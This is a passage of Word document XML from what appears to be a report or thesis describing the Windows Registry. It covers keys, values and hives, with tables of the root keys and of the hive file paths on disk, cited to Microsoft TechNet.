        <w:sdtPr>
          <w:id w:val="-62724857"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C111F5">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:instrText xml:space="preserve"> CITATION Mic1 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(5)</w:t>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007A6F8C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C111F5">
        <w:t xml:space="preserve">The data stored in </w:t>
      </w:r>
      <w:r>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00C111F5">
        <w:t xml:space="preserve"> follows a tree format. Each node is called a “key”, and each key can store many subordinate keys (sub-keys) and </w:t>
      </w:r>
      <w:r w:rsidR="002B7F94">
        <w:t>each sub-key</w:t>
      </w:r>
      <w:r w:rsidR="00C111F5">
        <w:t xml:space="preserve"> stores many data entries called “Values”</w:t>
      </w:r>
      <w:r w:rsidR="002B7F94">
        <w:t>. Some applications only require the presence of a key, other applications read into the keys and query the values stored in them. A key can store any value and a value can be in any type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C11BF" w:rsidRDefault="000C11BF" w:rsidP="002B7F94">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inside the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC114D" w:rsidRPr="00AC114D" w:rsidRDefault="00E41963" w:rsidP="00AC114D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00AC114D" w:rsidRPr="00AC114D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Hive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001561F9" w:rsidRDefault="000C11BF" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not a large file that is stored in disk, but it is a group of separated files called “hives”. A hive</w:t>
      </w:r>
      <w:r w:rsidR="00525B3D">
        <w:t xml:space="preserve"> is a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tree format data structure which has a key serving as the tree root, and each sub-key is a node of that tree </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="328416527"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009862B5">
            <w:instrText xml:space="preserve">CITATION Mic97 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009862B5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(6)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. We might think that each key is completely is</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t xml:space="preserve">olated with other key, however, there are correlations between </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t xml:space="preserve"> keys in the system. Table</w:t>
      </w:r>
      <w:r w:rsidR="00430F22">
        <w:t xml:space="preserve"> 2.1</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t xml:space="preserve"> shows the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t xml:space="preserve"> keys and their </w:t>
      </w:r>
      <w:r w:rsidR="009067EA">
        <w:t>correlations</w:t>
      </w:r>
      <w:r w:rsidR="001561F9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3380"/>
        <w:gridCol w:w="5390"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F6B4C" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="000F6B4C" w:rsidRPr="00430F22" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00430F22">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="000F6B4C" w:rsidRPr="00430F22" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00430F22">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F6B4C" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F6B4C" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_CLASSES_ROOT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F6B4C" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Symbolic link to HKEY_LOCAL_MACHINE \SOFTWARE \Classes</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_CURRENT_USER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Symbolic link to a key under HKEY_USERS representing a user's profile hive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_LOCAL_MACHINE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Placeholder with no corresponding physical hive. This key contains other keys that are hives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_USERS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Placeholder that contains the user-profile hives of logged-on accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_CURRENT_CONFIG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="009067EA">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Symbolic link to the key of the current hardware profile under HKEY_LOCAL_MACHINE \SYSTEM CurrentControlSet\ Control\IDConfigDB\Hardware Profiles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009067EA" w:rsidTr="009067EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRDefault="009067EA" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>HKEY_DYN_DATA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009067EA" w:rsidRPr="009067EA" w:rsidRDefault="009067EA" w:rsidP="00430F22">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009067EA">
              <w:t>Placeholder for performance data lookups. This key has no corresponding physical hive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00430F22" w:rsidP="00430F22">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc484886359"/>
      <w:r w:rsidRPr="00430F22">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00430F22">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F22">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> keys and their correlations.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00430F22" w:rsidP="00430F22">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430F22">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00430F22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00430F22">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00430F22" w:rsidP="00430F22">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Root keys can correlate to each other, but none of them correlate to their hives. Table 2.2 shows the list of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hives and their filename</w:t>
      </w:r>
      <w:r w:rsidR="00A738C2">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on system disk.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4384"/>
        <w:gridCol w:w="4386"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRPr="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Hive </w:t>
            </w:r>
            <w:r w:rsidR="00E41963">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Registry</w:t>
            </w:r>
            <w:r w:rsidRPr="00A738C2">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRPr="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Hive File Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\sam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SECURITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SOFTWARE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \HARDWARE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Volatile hive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SYSTEM \Clone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Volatile hive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_USERS \UserProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Profile; usually under \%windir%\profiles\usere</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_USERS.DEFAULT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00A738C2">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A738C2" w:rsidRPr="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00A738C2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc484886360"/>
      <w:r w:rsidRPr="00A738C2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
